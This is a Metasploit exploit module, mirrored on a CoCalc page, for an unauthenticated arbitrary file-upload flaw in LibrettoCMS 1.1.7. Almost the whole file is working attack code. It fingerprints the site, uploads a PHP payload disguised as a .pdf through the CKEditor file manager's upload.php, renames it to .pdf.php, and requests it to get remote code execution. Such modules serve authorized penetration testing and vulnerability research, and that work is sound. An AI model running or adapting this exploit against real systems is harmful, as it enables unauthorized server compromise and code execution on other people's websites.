Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/libretto_upload_exec.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::PhpEXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "LibrettoCMS File Manager Arbitary File Upload Vulnerability",

17
        'Description' => %q{

18
          This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and

19
          possibly prior.  Attackers can bypass the file extension check and abuse the upload

20
          feature in order to upload a malicious PHP file without authentication, which

21
          results in arbitrary remote code execution.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'CWH',

26
          'sinn3r' # Metasploit

27
        ],

28
        'References' => [

29
          ['OSVDB', '94391'],

30
          ['EDB', '26213']

31
        ],

32
        'Payload' => {

33
          'BadChars' => "\x00"

34
        },

35
        'Platform' => %w{linux php},

36
        'Targets' => [

37
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],

38
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]

39
        ],

40
        'Privileged' => false,

41
        'DisclosureDate' => '2013-06-14',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/'])

54
      ]

55
    )

56
  end

57


58
  def check

59
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) })

60
    if not res

61
      vprint_error("Connection timed out")

62
      return Exploit::CheckCode::Unknown

63
    end

64


65
    if res.body =~ /Powered by <a href=".+">Libretto CMS/

66
      return Exploit::CheckCode::Detected

67
    end

68


69
    Exploit::CheckCode::Safe

70
  end

71


72
  def upload(base)

73
    p = get_write_exec_payload(:unlink_self => true)

74
    fname = "#{Rex::Text.rand_text_alpha(6)}.pdf"

75


76
    data = Rex::MIME::Message.new

77
    data.add_part(fname, nil, nil, "form-data; name=\"Filename\"")

78
    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"")

79
    data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"')

80
    post_data = data.to_s

81


82
    uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php')

83


84
    res = send_request_cgi({

85
      'method' => 'POST',

86
      'uri' => uri,

87
      'ctype' => "multipart/form-data; boundary=#{data.bound}",

88
      'data' => post_data,

89
      'vars_get' => { 'type' => 'all files' }

90
    })

91


92
    if not res

93
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")

94
    elsif res.code.to_i != 200

95
      fail_with(Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code.to_s}")

96
    end

97


98
    fname

99
  end

100


101
  def rename(base, original_fname)

102
    new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php"

103
    uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'files.php')

104
    res = send_request_cgi({

105
      'method' => 'POST',

106
      'uri' => uri,

107
      'vars_get' => { 'type' => 'all files' },

108
      'vars_post' => {

109
        'fun' => 'renameFile',

110
        'dir' => '',

111
        'filename' => original_fname,

112
        'newFilename' => new_name

113
      }

114
    })

115


116
    if not res

117
      fail_with(Failure::Unknown, "#{peer} - Request timed out while renaming")

118
    elsif res.body !~ /"res":"OK"/

119
      fail_with(Failure::Unknown, "#{peer} - Failed to rename file")

120
    end

121


122
    new_name

123
  end

124


125
  def exec(base, payload_fname)

126
    res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) })

127
    if res and res.code.to_i == 404

128
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")

129
    end

130
  end

131


132
  def exploit

133
    base = target_uri.path

134


135
    print_status("Uploading malicious file...")

136
    orig_fname = upload(base)

137


138
    print_status("Renaming #{orig_fname}...")

139
    new_fname = rename(base, orig_fname)

140


141
    print_status("Executing #{new_fname}...")

142
    exec(base, new_fname)

143
  end

144
end

145


146